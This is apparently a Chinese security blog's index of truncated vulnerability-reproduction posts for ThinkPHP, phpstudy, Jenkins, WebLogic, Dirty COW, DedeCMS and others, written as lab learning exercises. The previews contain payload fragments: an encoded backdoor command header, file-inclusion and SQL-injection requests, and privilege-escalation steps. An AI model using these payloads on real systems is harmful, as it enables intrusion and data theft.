漏洞利用
小鱼儿waha
抓紧 留给自己的时间不多了
展开
-
XML所引起的xss攻击
利用条件:1、满足同源策略test.jpg<?xml version="1.0" encoding="iso-8859-1"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><ht...原创 2019-10-15 09:41:41 · 4743 阅读 · 1 评论 -
XXE漏洞利用
英文全名即 Xml External Entity Injection, 即我们所说的 xml 外部实体注入攻击。实体可以通过预定义在文档中被调用,而实体的标识符又可以访问本地或者远程内容,当允许引用外部实体时,攻击者便可以构造恶意内容来达到攻击。XML:xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟...原创 2019-10-14 21:28:52 · 458 阅读 · 1 评论 -
UEditor 1.4.3.3的SSRF漏洞
产生漏洞的代码片段: ueditor\php\Uploader.class.phpprivate function saveRemote(){ $imgUrl = htmlspecialchars($this->fileField); $imgUrl = str_replace("&", "&", $imgUrl); //http开头验证...原创 2019-10-12 22:59:02 · 5620 阅读 · 0 评论 -
phpstudy php_xmlrpc.dll后门漏洞复现
搭建环境:phpstudy2018php版本5.4漏洞影响版本:5.2/5.4漏洞利用1、随便访问一个存在的php文件 我这里就访问index.php好了2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==Accept-Encoding: gzip,def...原创 2019-09-26 23:02:59 · 7213 阅读 · 0 评论 -
[CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞
vulhub环境搭建:cd /root/vulhub/jenkins/CVE-2017-1000353docker-compose up -d访问网址http://120.79.66.58:8080/漏洞复现:1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的pocjava -jar CVE-2017-1000353-1.1-S...原创 2019-09-21 16:04:54 · 500 阅读 · 0 评论 -
[wordpress] Social Warfar插件小于等于3.5.2前台代码执行
1、检测是否安装了 Social Warfare 插件 访问http://127.0.0.1/wp-content/plugins/social-warfare/readme.txt,如果存在 readme.txt 文件则说明已经安装该插件,并且从 该 txt 文件中可获知插件的版本。2、在自己的 VPS 服务器上放置一个code.txt文件,并启动HTTP服务器使该文件可通过HTTP访问。...原创 2019-09-10 16:01:57 · 227 阅读 · 0 评论 -
[CVE-2013-4547]Nginx 文件名逻辑漏洞复现
CVE-2013-4547是Nginx中间件的一个文件名解析漏洞影响版本:2013年底,nginx再次爆出漏洞(CVE-2013-4547),此漏洞可导致目录跨越及代码执行,其影响版本为: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7,范围较广。利用原理:[20][00]绕过nginx逻辑验证利用方式:1、docker-compose up -d...原创 2019-09-01 00:45:51 · 283 阅读 · 0 评论 -
[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现
触发原因:preg_replace函数引发的触发原理:preg_replace漏洞触发有两个前提:01:第一个参数需要e标识符,有了它可以执行第二个参数的命令02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令,举个例子:影响漏洞版本:漏洞复现:1、docker搭建 docker-compose up -d2、漏洞利用代码:python php...原创 2019-08-30 16:21:45 · 680 阅读 · 0 评论 -
phpcms的漏洞复现
xxxxxxxxxxx原创 2019-09-26 22:35:53 · 3769 阅读 · 0 评论 -
[CVE-2016-5195]linux脏牛提权复现
1、复制源代码dirty.c到可读写目录-------》 /tmp/dirty.c2、进行gcc编译-----------------------》gcc -pthread dirty.c -o dirty -lcrypt3、运行编译好的文件-------------------》./dirty 你设置的密码4、如果一直卡住的话尝试反弹shell 在交互式中进行...原创 2019-08-21 12:54:38 · 484 阅读 · 0 评论 -
weblogic漏洞从0学习复现
这两天慢慢复现完weblogic的漏洞weblogic的历史漏洞#控制台路径泄露Weakpassword #SSRF:CVE-2014-4210 #JAVA反序列化:CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 CVE-2018-2628 CVE-2018-2893 #任意文...原创 2019-09-27 09:23:39 · 601 阅读 · 0 评论 -
ThinkCMFX漏洞合集
前台的SQL注入(需要前台会员权限):POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1Host: localhostConnection: closeCookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95Content-Type: application/...原创 2019-08-13 20:30:57 · 5654 阅读 · 0 评论 -
[CVE-2016–3714]-Imagetragick 命令执行漏洞复现
路径:/root/vulhub/imagemagick/imagetragick搭建:docker-compose up -d打开地址:存在三个文件demo.php upload.php vul.jpgvul.jpg是攻击的模板push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg...原创 2019-08-13 13:06:09 · 752 阅读 · 2 评论 -
基于tp3的sql注入漏洞的复现
1.field注入<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller { public function fieldsql(){ $table_name = I('GET.id') ? I('GET.id') : 1; ...原创 2019-06-15 19:40:19 · 2519 阅读 · 0 评论 -
dedecms的漏洞
5.7 sp1爆数据库/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...原创 2019-05-10 15:48:14 · 2823 阅读 · 0 评论 -
[CVE-2017-12615]漏洞复现
漏洞编号CVE-2017-12615漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本环境搭建docker搭建ubuntu16.04+dockersudo docker-compose up -d手动搭建tomcat7.0.0-7.0.81 环境然后自己去配置当前目录下的/conf/web.xml 添加如下代码:readonlyfalse利用...原创 2019-05-07 16:28:15 · 2545 阅读 · 0 评论 -
thinkphp5的漏洞
文件包含:http://ip/index.php?s=captcha&m=1post提交:_method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]=代码执行漏洞:http://bugbank.51vi...原创 2019-04-10 19:06:37 · 1359 阅读 · 0 评论